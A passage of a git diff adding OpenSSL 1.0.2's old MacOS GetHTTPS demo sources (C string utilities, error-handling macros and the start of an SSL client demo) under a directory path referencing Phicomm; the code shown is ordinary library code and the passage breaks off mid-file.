+		SetErrorMessage("ExtractCStrItemFromCStrIntoNewHandle: Bad parameter, inSrcCStr == nil");
+		errCode = kGenericError;
+		goto EXITPOINT;
+	}
+	
+	if (outNewHandle == nil)
+	{
+		SetErrorMessage("ExtractCStrItemFromCStrIntoNewHandle: Bad parameter, outNewHandle == nil");
+		errCode = kGenericError;
+		goto EXITPOINT;
+	}
+	
+	if (foundItem == nil)
+	{
+		SetErrorMessage("ExtractCStrItemFromCStrIntoNewHandle: Bad parameter, foundItem == nil");
+		errCode = kGenericError;
+		goto EXITPOINT;
+	}
+	
+	if (inItemNumber < 0)
+	{
+		SetErrorMessage("ExtractCStrItemFromCStrIntoNewHandle: Bad parameter, inItemNumber < 0");
+		errCode = kGenericError;
+		goto EXITPOINT;
+	}
+	
+	if (inItemDelimiter == 0)
+	{
+		SetErrorMessage("ExtractCStrItemFromCStrIntoNewHandle: Bad parameter, inItemDelimiter == 0");
+		errCode = kGenericError;
+		goto EXITPOINT;
+	}
+
+
+	*foundItem = false;
+	
+	theSrcCharIndex = 0;
+	
+	for (theItem = 0;theItem < inItemNumber;theItem++)
+	{
+		while (inSrcCStr[theSrcCharIndex] != inItemDelimiter && inSrcCStr[theSrcCharIndex] != '\0')
+		{
+			theSrcCharIndex++;
+		}
+		
+		if (inSrcCStr[theSrcCharIndex] == inItemDelimiter)
+		{
+			theSrcCharIndex++;
+			
+			if (inTreatMultipleDelimsAsSingleDelim)
+			{
+				while (inSrcCStr[theSrcCharIndex] == inItemDelimiter)
+				{
+					theSrcCharIndex++;
+				}
+			}
+		}
+		
+		
+		if (inSrcCStr[theSrcCharIndex] == '\0')
+		{
+			errCode = noErr;
+			
+			goto EXITPOINT;
+		}
+	}
+	
+
+	*foundItem = true;
+	
+	
+	for (theItemLength = 0;;theItemLength++)
+	{
+		if (inSrcCStr[theSrcCharIndex + theItemLength] == 0 || inSrcCStr[theSrcCharIndex + theItemLength] == inItemDelimiter)
+		{
+			break;
+		}
+	}
+	
+
+	*outNewHandle = NewHandle(theItemLength + 1);
+	
+	if (*outNewHandle == nil)
+	{
+		SetErrorMessageAndLongIntAndBail("ExtractCStrItemFromCStrIntoNewHandle: Can't allocate Handle, MemError() = ",MemError());
+	}
+	
+	
+	BlockMove(inSrcCStr + theSrcCharIndex,**outNewHandle,theItemLength);
+	
+	(**outNewHandle)[theItemLength] = 0;
+	
+	errCode = noErr;
+	
+	
+EXITPOINT:
+
+	return(errCode);
+}
+
+
+
+
+
+
+OSErr ExtractFloatFromCStr(const char *inCString,extended80 *outFloat)
+{
+OSErr				errCode;
+Str255				theStr255;
+Handle				theNumberPartsTableHandle = nil;
+long				theNumberPartsOffset,theNumberPartsLength;
+FormatResultType	theFormatResultType;
+NumberParts			theNumberPartsTable;
+NumFormatStringRec	theNumFormatStringRec;
+
+
+	if (inCString == nil)
+	{
+		SetErrorMessage("ExtractFloatFromCStr: Bad parameter, inCString == nil");
+		errCode = kGenericError;
+		goto EXITPOINT;
+	}
+
+	if (outFloat == nil)
+	{
+		SetErrorMessage("ExtractFloatFromCStr: Bad parameter, outFloat == nil");
+		errCode = kGenericError;
+		goto EXITPOINT;
+	}
+	
+	
+//	GetIntlResourceTable(smRoman,smNumberPartsTable,&theNumberPartsTableHandle,&theNumberPartsOffset,&theNumberPartsLength);
+
+	GetIntlResourceTable(GetScriptManagerVariable(smSysScript),smNumberPartsTable,&theNumberPartsTableHandle,&theNumberPartsOffset,&theNumberPartsLength);	
+	
+	if (theNumberPartsTableHandle == nil)
+	{
+		SetErrorMessage("ExtractFloatFromCStr: Can't get number parts table for converting string representations to/from numeric representations");
+		errCode = kGenericError;
+		goto EXITPOINT;
+	}
+	
+	if (theNumberPartsLength > sizeof(theNumberPartsTable))
+	{
+		SetErrorMessage("ExtractFloatFromCStr: Number parts table has bad length");
+		errCode = kGenericError;
+		goto EXITPOINT;
+	}
+	
+
+	BlockMove(*theNumberPartsTableHandle + theNumberPartsOffset,&theNumberPartsTable,theNumberPartsLength);
+	
+	
+	theFormatResultType = (FormatResultType) StringToFormatRec(kNumberFormatString,&theNumberPartsTable,&theNumFormatStringRec);
+	
+	if (theFormatResultType != fFormatOK)
+	{
+		SetErrorMessage("ExtractFloatFromCStr: StringToFormatRec() != fFormatOK");
+		errCode = kGenericError;
+		goto EXITPOINT;
+	}
+
+	
+	CopyCStrToPStr(inCString,theStr255,sizeof(theStr255));
+
+
+	theFormatResultType = (FormatResultType) StringToExtended(theStr255,&theNumFormatStringRec,&theNumberPartsTable,outFloat);
+	
+	if (theFormatResultType != fFormatOK && theFormatResultType != fBestGuess)
+	{
+		SetErrorMessageAndLongIntAndBail("ExtractFloatFromCStr: StringToExtended() = ",theFormatResultType);
+	}
+
+	
+	errCode = noErr;
+	
+
+EXITPOINT:
+	
+	return(errCode);
+}
+
+
+
+OSErr CopyFloatToCStr(const extended80 *theFloat,char *theCStr,const int maxCStrLength,const int inMaxNumIntDigits,const int inMaxNumFractDigits)
+{
+OSErr				errCode;
+Str255				theStr255;
+Handle				theNumberPartsTableHandle = nil;
+long				theNumberPartsOffset,theNumberPartsLength;
+FormatResultType	theFormatResultType;
+NumberParts			theNumberPartsTable;
+NumFormatStringRec	theNumFormatStringRec;
+
+
+	if (theCStr == nil)
+	{
+		SetErrorMessage("CopyFloatToCStr: Bad parameter, theCStr == nil");
+		errCode = kGenericError;
+		goto EXITPOINT;
+	}
+
+	if (theFloat == nil)
+	{
+		SetErrorMessage("CopyFloatToCStr: Bad parameter, theFloat == nil");
+		errCode = kGenericError;
+		goto EXITPOINT;
+	}
+	
+
+//	GetIntlResourceTable(smRoman,smNumberPartsTable,&theNumberPartsTableHandle,&theNumberPartsOffset,&theNumberPartsLength);
+
+	GetIntlResourceTable(GetScriptManagerVariable(smSysScript),smNumberPartsTable,&theNumberPartsTableHandle,&theNumberPartsOffset,&theNumberPartsLength);	
+	
+	if (theNumberPartsTableHandle == nil)
+	{
+		SetErrorMessage("CopyFloatToCStr: Can't get number parts table for converting string representations to/from numeric representations");
+		errCode = kGenericError;
+		goto EXITPOINT;
+	}
+	
+	if (theNumberPartsLength > sizeof(theNumberPartsTable))
+	{
+		SetErrorMessage("CopyFloatToCStr: Number parts table has bad length");
+		errCode = kGenericError;
+		goto EXITPOINT;
+	}
+	
+	
+	BlockMove(*theNumberPartsTableHandle + theNumberPartsOffset,&theNumberPartsTable,theNumberPartsLength);
+	
+	
+	if (inMaxNumIntDigits >= 0 || inMaxNumFractDigits >= 0)
+	{
+	char	numberFormat[64];
+	int		numberFormatLength = 0;
+	
+		for (int i = 0;i < inMaxNumIntDigits && numberFormatLength < sizeof(numberFormat) - 1;i++)
+		{
+			numberFormat[numberFormatLength++] = '0';
+		}
+		
+		if (inMaxNumFractDigits > 0 && numberFormatLength < sizeof(numberFormat) - 1)
+		{
+			numberFormat[numberFormatLength++] = '.';
+			
+			for (int i = 0;i < inMaxNumFractDigits && numberFormatLength < sizeof(numberFormat) - 1;i++)
+			{
+				numberFormat[numberFormatLength++] = '0';
+			}
+		}
+
+		
+		if (numberFormatLength < sizeof(numberFormat) - 1)
+		{
+			numberFormat[numberFormatLength++] = ';';
+		}
+		
+		if (numberFormatLength < sizeof(numberFormat) - 1)
+		{
+			numberFormat[numberFormatLength++] = '-';
+		}
+		
+
+		for (int i = 0;i < inMaxNumIntDigits && numberFormatLength < sizeof(numberFormat) - 1;i++)
+		{
+			numberFormat[numberFormatLength++] = '0';
+		}
+		
+		if (inMaxNumFractDigits > 0 && numberFormatLength < sizeof(numberFormat) - 1)
+		{
+			numberFormat[numberFormatLength++] = '.';
+			
+			for (int i = 0;i < inMaxNumFractDigits && numberFormatLength < sizeof(numberFormat) - 1;i++)
+			{
+				numberFormat[numberFormatLength++] = '0';
+			}
+		}
+		
+		numberFormat[numberFormatLength] = '\0';
+
+
+	Str255	tempStr255;
+	
+		CopyCStrToPStr(numberFormat,tempStr255,sizeof(tempStr255));
+		
+		theFormatResultType = (FormatResultType) StringToFormatRec(tempStr255,&theNumberPartsTable,&theNumFormatStringRec);
+	}
+	
+	else
+	{
+		theFormatResultType = (FormatResultType) StringToFormatRec(kNumberFormatString,&theNumberPartsTable,&theNumFormatStringRec);
+	}
+	
+	if (theFormatResultType != fFormatOK)
+	{
+		SetErrorMessage("CopyFloatToCStr: StringToFormatRec() != fFormatOK");
+		errCode = kGenericError;
+		goto EXITPOINT;
+	}
+
+
+	theFormatResultType = (FormatResultType) ExtendedToString(theFloat,&theNumFormatStringRec,&theNumberPartsTable,theStr255);
+	
+	if (theFormatResultType != fFormatOK)
+	{
+		SetErrorMessage("CopyFloatToCStr: ExtendedToString() != fFormatOK");
+		errCode = kGenericError;
+		goto EXITPOINT;
+	}
+
+	
+	CopyPStrToCStr(theStr255,theCStr,maxCStrLength);
+	
+	errCode = noErr;
+	
+
+EXITPOINT:
+	
+	return(errCode);
+}
+
+
+
+
+
+void SkipWhiteSpace(char **ioSrcCharPtr,const Boolean inStopAtEOL)
+{
+	if (ioSrcCharPtr != nil && *ioSrcCharPtr != nil)
+	{
+		if (inStopAtEOL)
+		{
+			while ((**ioSrcCharPtr == ' ' || **ioSrcCharPtr == '\t') && **ioSrcCharPtr != '\r' && **ioSrcCharPtr != '\n')
+			{
+				*ioSrcCharPtr++;
+			}
+		}
+		
+		else
+		{
+			while (**ioSrcCharPtr == ' ' || **ioSrcCharPtr == '\t')
+			{
+				*ioSrcCharPtr++;
+			}
+		}
+	}
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/CPStringUtils.hpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/CPStringUtils.hpp
new file mode 100644
index 0000000..5045c41
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/CPStringUtils.hpp
@@ -0,0 +1,104 @@
+#pragma once
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+void CopyPStrToCStr(const unsigned char *thePStr,char *theCStr,const int maxCStrLength);
+void CopyPStrToPStr(const unsigned char *theSrcPStr,unsigned char *theDstPStr,const int maxDstStrLength);
+void CopyCStrToCStr(const char *theSrcCStr,char *theDstCStr,const int maxDstStrLength);
+void CopyCStrToPStr(const char *theSrcCStr,unsigned char *theDstPStr,const int maxDstStrLength);
+void ConcatPStrToCStr(const unsigned char *thePStr,char *theCStr,const int maxCStrLength);
+void ConcatPStrToPStr(const unsigned char *theSrcPStr,unsigned char *theDstPStr,const int maxDstStrLength);
+void ConcatCStrToPStr(const char *theSrcCStr,unsigned char *theDstPStr,const int maxDstStrLength);
+void ConcatCStrToCStr(const char *theSrcCStr,char *theDstCStr,const int maxCStrLength);
+
+void ConcatCharToCStr(const char theChar,char *theDstCStr,const int maxCStrLength);
+void ConcatCharToPStr(const char theChar,unsigned char *theDstPStr,const int maxPStrLength);
+
+int ComparePStrs(const unsigned char *theFirstPStr,const unsigned char *theSecondPStr,const Boolean ignoreCase = true);
+int CompareCStrs(const char *theFirstCStr,const char *theSecondCStr,const Boolean ignoreCase = true);
+int CompareCStrToPStr(const char *theCStr,const unsigned char *thePStr,const Boolean ignoreCase = true);
+
+Boolean CStrsAreEqual(const char *theFirstCStr,const char *theSecondCStr,const Boolean ignoreCase = true);
+Boolean PStrsAreEqual(const unsigned char *theFirstCStr,const unsigned char *theSecondCStr,const Boolean ignoreCase = true);
+
+void CopyLongIntToCStr(const long theNum,char *theCStr,const int maxCStrLength,const int numDigits = -1);
+void CopyUnsignedLongIntToCStr(const unsigned long theNum,char *theCStr,const int maxCStrLength);
+void ConcatLongIntToCStr(const long theNum,char *theCStr,const int maxCStrLength,const int numDigits = -1);
+void CopyCStrAndConcatLongIntToCStr(const char *theSrcCStr,const long theNum,char *theDstCStr,const int maxDstStrLength);
+
+void CopyLongIntToPStr(const long theNum,unsigned char *thePStr,const int maxPStrLength,const int numDigits = -1);
+void ConcatLongIntToPStr(const long theNum,unsigned char *thePStr,const int maxPStrLength,const int numDigits = -1);
+
+long CStrLength(const char *theCString);
+long PStrLength(const unsigned char *thePString);
+
+OSErr CopyCStrToExistingHandle(const char *theCString,Handle theHandle);
+OSErr CopyLongIntToExistingHandle(const long inTheLongInt,Handle theHandle);
+
+OSErr CopyCStrToNewHandle(const char *theCString,Handle *theHandle);
+OSErr CopyPStrToNewHandle(const unsigned char *thePString,Handle *theHandle);
+OSErr CopyLongIntToNewHandle(const long inTheLongInt,Handle *theHandle);
+
+OSErr AppendCStrToHandle(const char *theCString,Handle theHandle,long *currentLength = nil,long *maxLength = nil);
+OSErr AppendCharsToHandle(const char *theChars,const int numChars,Handle theHandle,long *currentLength = nil,long *maxLength = nil);
+OSErr AppendPStrToHandle(const unsigned char *thePString,Handle theHandle,long *currentLength = nil);
+OSErr AppendLongIntToHandle(const long inTheLongInt,Handle theHandle,long *currentLength = nil);
+
+void ZeroMem(void *theMemPtr,const unsigned long numBytes);
+
+char *FindCharInCStr(const char theChar,const char *theCString);
+long FindCharOffsetInCStr(const char theChar,const char *theCString,const Boolean inIgnoreCase = false);
+long FindCStrOffsetInCStr(const char *theCSubstring,const char *theCString,const Boolean inIgnoreCase = false);
+
+void CopyCSubstrToCStr(const char *theSrcCStr,const int maxCharsToCopy,char *theDstCStr,const int maxDstStrLength);
+void CopyCSubstrToPStr(const char *theSrcCStr,const int maxCharsToCopy,unsigned char *theDstPStr,const int maxDstStrLength);
+
+void InsertCStrIntoCStr(const char *theSrcCStr,const int theInsertionOffset,char *theDstCStr,const int maxDstStrLength);
+void InsertPStrIntoCStr(const unsigned char *theSrcPStr,const int theInsertionOffset,char *theDstCStr,const int maxDstStrLength);
+OSErr InsertCStrIntoHandle(const char *theCString,Handle theHandle,const long inInsertOffset);
+
+void CopyCStrAndInsertCStrIntoCStr(const char *theSrcCStr,const char *theInsertCStr,char *theDstCStr,const int maxDstStrLength);
+
+void CopyCStrAndInsertCStrsLongIntsIntoCStr(const char *theSrcCStr,const char **theInsertCStrs,const long *theLongInts,char *theDstCStr,const int maxDstStrLength);
+
+void CopyCStrAndInsert1LongIntIntoCStr(const char *theSrcCStr,const long theNum,char *theDstCStr,const int maxDstStrLength);
+void CopyCStrAndInsert2LongIntsIntoCStr(const char *theSrcCStr,const long long1,const long long2,char *theDstCStr,const int maxDstStrLength);
+void CopyCStrAndInsert3LongIntsIntoCStr(const char *theSrcCStr,const long long1,const long long2,const long long3,char *theDstCStr,const int maxDstStrLength);
+
+void CopyCStrAndInsertCStrLongIntIntoCStr(const char *theSrcCStr,const char *theInsertCStr,const long theNum,char *theDstCStr,const int maxDstStrLength);
+OSErr CopyCStrAndInsertCStrLongIntIntoHandle(const char *theSrcCStr,const char *theInsertCStr,const long theNum,Handle *theHandle);
+
+
+OSErr CopyIndexedWordToCStr(char *theSrcCStr,int whichWord,char *theDstCStr,int maxDstCStrLength);
+OSErr CopyIndexedWordToNewHandle(char *theSrcCStr,int whichWord,Handle *outTheHandle);
+
+OSErr CopyIndexedLineToCStr(const char *theSrcCStr,int inWhichLine,int *lineEndIndex,Boolean *gotLastLine,char *theDstCStr,const int maxDstCStrLength);
+OSErr CopyIndexedLineToNewHandle(const char *theSrcCStr,int inWhichLine,Handle *outNewHandle);
+
+OSErr ExtractIntFromCStr(const char *theSrcCStr,int *outInt,Boolean skipLeadingSpaces = true);
+OSErr ExtractIntFromPStr(const unsigned char *theSrcPStr,int *outInt,Boolean skipLeadingSpaces = true);
+
+
+void ConvertCStrToUpperCase(char *theSrcCStr);
+
+
+int CountOccurencesOfCharInCStr(const char inChar,const char *inSrcCStr);
+int CountWordsInCStr(const char *inSrcCStr);
+
+OSErr CountDigits(const char *inCStr,int *outNumIntegerDigits,int *outNumFractDigits);
+
+void ExtractCStrItemFromCStr(const char *inSrcCStr,const char inItemDelimiter,const int inItemNumber,Boolean *foundItem,char *outDstCharPtr,const int inDstCharPtrMaxLength,const Boolean inTreatMultipleDelimsAsSingleDelim = false);
+OSErr ExtractCStrItemFromCStrIntoNewHandle(const char *inSrcCStr,const char inItemDelimiter,const int inItemNumber,Boolean *foundItem,Handle *outNewHandle,const Boolean inTreatMultipleDelimsAsSingleDelim = false);
+
+
+OSErr ExtractFloatFromCStr(const char *inCString,extended80 *outFloat);
+OSErr CopyFloatToCStr(const extended80 *theFloat,char *theCStr,const int maxCStrLength,const int inMaxNumIntDigits = -1,const int inMaxNumFractDigits = -1);
+
+void SkipWhiteSpace(char **ioSrcCharPtr,const Boolean inStopAtEOL = false);
+
+
+#ifdef __cplusplus
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/ErrorHandling.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/ErrorHandling.cpp
new file mode 100644
index 0000000..80b6a67
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/ErrorHandling.cpp
@@ -0,0 +1,170 @@
+/* ====================================================================
+ * Copyright (c) 1998-1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer. 
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+ 
+ 
+ 
+ #include "ErrorHandling.hpp"
+#include "CPStringUtils.hpp"
+
+#ifdef __EXCEPTIONS_ENABLED__
+	#include "CMyException.hpp"
+#endif
+
+
+static char					gErrorMessageBuffer[512];
+
+char 						*gErrorMessage = gErrorMessageBuffer;
+int							gErrorMessageMaxLength = sizeof(gErrorMessageBuffer);
+
+
+
+void SetErrorMessage(const char *theErrorMessage)
+{
+	if (theErrorMessage != nil)
+	{
+		CopyCStrToCStr(theErrorMessage,gErrorMessage,gErrorMessageMaxLength);
+	}
+}
+
+
+void SetErrorMessageAndAppendLongInt(const char *theErrorMessage,const long theLongInt)
+{
+	if (theErrorMessage != nil)
+	{
+		CopyCStrAndConcatLongIntToCStr(theErrorMessage,theLongInt,gErrorMessage,gErrorMessageMaxLength);
+	}
+}
+
+void SetErrorMessageAndCStrAndLongInt(const char *theErrorMessage,const char * theCStr,const long theLongInt)
+{
+	if (theErrorMessage != nil)
+	{
+		CopyCStrAndInsertCStrLongIntIntoCStr(theErrorMessage,theCStr,theLongInt,gErrorMessage,gErrorMessageMaxLength);
+	}
+
+}
+
+void SetErrorMessageAndCStr(const char *theErrorMessage,const char * theCStr)
+{
+	if (theErrorMessage != nil)
+	{
+		CopyCStrAndInsertCStrLongIntIntoCStr(theErrorMessage,theCStr,-1,gErrorMessage,gErrorMessageMaxLength);
+	}
+}
+
+
+void AppendCStrToErrorMessage(const char *theErrorMessage)
+{
+	if (theErrorMessage != nil)
+	{
+		ConcatCStrToCStr(theErrorMessage,gErrorMessage,gErrorMessageMaxLength);
+	}
+}
+
+
+void AppendLongIntToErrorMessage(const long theLongInt)
+{
+	ConcatLongIntToCStr(theLongInt,gErrorMessage,gErrorMessageMaxLength);
+}
+
+
+
+char *GetErrorMessage(void)
+{
+	return gErrorMessage;
+}
+
+
+OSErr GetErrorMessageInNewHandle(Handle *inoutHandle)
+{
+OSErr		errCode;
+
+
+	errCode = CopyCStrToNewHandle(gErrorMessage,inoutHandle);
+	
+	return(errCode);
+}
+
+
+OSErr GetErrorMessageInExistingHandle(Handle inoutHandle)
+{
+OSErr		errCode;
+
+
+	errCode = CopyCStrToExistingHandle(gErrorMessage,inoutHandle);
+	
+	return(errCode);
+}
+
+
+
+OSErr AppendErrorMessageToHandle(Handle inoutHandle)
+{
+OSErr		errCode;
+
+
+	errCode = AppendCStrToHandle(gErrorMessage,inoutHandle,nil);
+	
+	return(errCode);
+}
+
+
+#ifdef __EXCEPTIONS_ENABLED__
+
+void ThrowErrorMessageException(void)
+{
+	ThrowDescriptiveException(gErrorMessage);
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/ErrorHandling.hpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/ErrorHandling.hpp
new file mode 100644
index 0000000..fbfbe78
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/ErrorHandling.hpp
@@ -0,0 +1,147 @@
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+#ifndef kGenericError
+	#define kGenericError		-1
+#endif
+
+extern char	*gErrorMessage;
+
+
+void SetErrorMessage(const char *theErrorMessage);
+void SetErrorMessageAndAppendLongInt(const char *theErrorMessage,const long theLongInt);
+void SetErrorMessageAndCStrAndLongInt(const char *theErrorMessage,const char * theCStr,const long theLongInt);
+void SetErrorMessageAndCStr(const char *theErrorMessage,const char * theCStr);
+void AppendCStrToErrorMessage(const char *theErrorMessage);
+void AppendLongIntToErrorMessage(const long theLongInt);
+
+
+char *GetErrorMessage(void);
+OSErr GetErrorMessageInNewHandle(Handle *inoutHandle);
+OSErr GetErrorMessageInExistingHandle(Handle inoutHandle);
+OSErr AppendErrorMessageToHandle(Handle inoutHandle);
+
+
+#ifdef __EXCEPTIONS_ENABLED__
+	void ThrowErrorMessageException(void);
+#endif
+
+
+
+//	A bunch of evil macros that would be unnecessary if I were always using C++ !
+
+#define SetErrorMessageAndBailIfNil(theArg,theMessage)								\
+{																					\
+	if (theArg == nil)																\
+	{																				\
+		SetErrorMessage(theMessage);												\
+		errCode = kGenericError;													\
+		goto EXITPOINT;																\
+	}																				\
+}
+
+
+#define SetErrorMessageAndBail(theMessage)											\
+{																					\
+		SetErrorMessage(theMessage);												\
+		errCode = kGenericError;													\
+		goto EXITPOINT;																\
+}
+
+
+#define SetErrorMessageAndLongIntAndBail(theMessage,theLongInt)						\
+{																					\
+		SetErrorMessageAndAppendLongInt(theMessage,theLongInt);						\
+		errCode = kGenericError;													\
+		goto EXITPOINT;																\
+}
+
+
+#define SetErrorMessageAndLongIntAndBailIfError(theErrCode,theMessage,theLongInt)	\
+{																					\
+	if (theErrCode != noErr)														\
+	{																				\
+		SetErrorMessageAndAppendLongInt(theMessage,theLongInt);						\
+		errCode = theErrCode;														\
+		goto EXITPOINT;																\
+	}																				\
+}
+
+
+#define SetErrorMessageCStrLongIntAndBailIfError(theErrCode,theMessage,theCStr,theLongInt)	\
+{																					\
+	if (theErrCode != noErr)														\
+	{																				\
+		SetErrorMessageAndCStrAndLongInt(theMessage,theCStr,theLongInt);			\
+		errCode = theErrCode;														\
+		goto EXITPOINT;																\
+	}																				\
+}
+
+
+#define SetErrorMessageAndCStrAndBail(theMessage,theCStr)							\
+{																					\
+	SetErrorMessageAndCStr(theMessage,theCStr);										\
+	errCode = kGenericError;														\
+	goto EXITPOINT;																	\
+}
+
+
+#define SetErrorMessageAndBailIfError(theErrCode,theMessage)						\
+{																					\
+	if (theErrCode != noErr)														\
+	{																				\
+		SetErrorMessage(theMessage);												\
+		errCode = theErrCode;														\
+		goto EXITPOINT;																\
+	}																				\
+}
+
+
+#define SetErrorMessageAndLongIntAndBailIfNil(theArg,theMessage,theLongInt)			\
+{																					\
+	if (theArg == nil)																\
+	{																				\
+		SetErrorMessageAndAppendLongInt(theMessage,theLongInt);						\
+		errCode = kGenericError;													\
+		goto EXITPOINT;																\
+	}																				\
+}
+
+
+#define BailIfError(theErrCode)														\
+{																					\
+	if ((theErrCode) != noErr)														\
+	{																				\
+		goto EXITPOINT;																\
+	}																				\
+}
+
+
+#define SetErrCodeAndBail(theErrCode)												\
+{																					\
+	errCode = theErrCode;															\
+																					\
+	goto EXITPOINT;																	\
+}
+
+
+#define SetErrorCodeAndMessageAndBail(theErrCode,theMessage)						\
+{																					\
+	SetErrorMessage(theMessage);													\
+	errCode = theErrCode;															\
+	goto EXITPOINT;																	\
+}
+
+
+#define BailNow()																	\
+{																					\
+	errCode = kGenericError;														\
+	goto EXITPOINT;																	\
+}
+
+
+#ifdef __cplusplus
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/GetHTTPS.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/GetHTTPS.cpp
new file mode 100644
index 0000000..3a5e3f0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/GetHTTPS.cpp
@@ -0,0 +1,209 @@
+/*
+ *	An demo illustrating how to retrieve a URI from a secure HTTP server.
+ *
+ *	Author: 	Roy Wood
+ *	Date:		September 7, 1999
+ *	Comments:	This relies heavily on my MacSockets library.
+ *				This project is also set up so that it expects the OpenSSL source folder (0.9.4 as I write this)
+ *				to live in a folder called "OpenSSL-0.9.4" in this project's parent folder.  For example:
+ *
+ *					Macintosh HD:
+ *						Development:
+ *							OpenSSL-0.9.4:
+ *								(OpenSSL sources here)
+ *							OpenSSL Example:
+ *								(OpenSSL example junk here)
+ *
+ *
+ *				Also-- before attempting to compile this, make sure the aliases in "OpenSSL-0.9.4:include:openssl" 
+ *				are installed!  Use the AppleScript applet in the "openssl-0.9.4" folder to do this!
+ */
+/* modified to seed the PRNG */
+/* modified to use CRandomizer for seeding */
+
+
+//	Include some funky libs I've developed over time
+
+#include "CPStringUtils.hpp"
+#include "ErrorHandling.hpp"
+#include "MacSocket.h"
+#include "Randomizer.h"
+
+//	We use the OpenSSL implementation of SSL....
+//	This was a lot of work to finally get going, though you wouldn't know it by the results!
+
+#include <openssl/ssl.h>
+#include <openssl/err.h>
+
+#include <timer.h>
+
+//	Let's try grabbing some data from here:
+
+#define kHTTPS_DNS		"www.apache-ssl.org"
+#define kHTTPS_Port		443
+#define kHTTPS_URI		"/"
+
+
+//	Forward-declare this
+
+OSErr MyMacSocket_IdleWaitCallback(void *inUserRefPtr);
+
+//	My idle-wait callback.  Doesn't do much, does it?  Silly cooperative multitasking.
+
+OSErr MyMacSocket_IdleWaitCallback(void *inUserRefPtr)
+{
+#pragma unused(inUserRefPtr)
+
+EventRecord		theEvent;
+	::EventAvail(everyEvent,&theEvent);
+	
+	CRandomizer *randomizer = (CRandomizer*)inUserRefPtr;
+	if (randomizer)
+		randomizer->PeriodicAction();
+
+	return(noErr);
+}
+
+
+//	Finally!
+
+void main(void)
+{
+	OSErr				errCode;
+	int					theSocket = -1;
+	int					theTimeout = 30;
+
+	SSL_CTX				*ssl_ctx = nil;
+	SSL					*ssl = nil;
+
+	char				tempString[256];
+	UnsignedWide		microTickCount;
+
+
+	CRandomizer randomizer;
+	
+	printf("OpenSSL Demo by Roy Wood, roy@centricsystems.ca\n\n");
+	
+	BailIfError(errCode = MacSocket_Startup());
+
+
+
+	//	Create a socket-like object
+	
+	BailIfError(errCode = MacSocket_socket(&theSocket,false,theTimeout * 60,MyMacSocket_IdleWaitCallback,&randomizer));
+
+	
+	//	Set up the connect string and try to connect
+	
+	CopyCStrAndInsertCStrLongIntIntoCStr("%s:%ld",kHTTPS_DNS,kHTTPS_Port,tempString,sizeof(tempString));
+	
+	printf("Connecting to %s....\n",tempString);
+
+	BailIfError(errCode = MacSocket_connect(theSocket,tempString));
+	
+	
+	//	Init SSL stuff
+	
+	SSL_load_error_strings();
+	
+	SSLeay_add_ssl_algorithms();
+	
+	
+	//	Pick the SSL method
+	
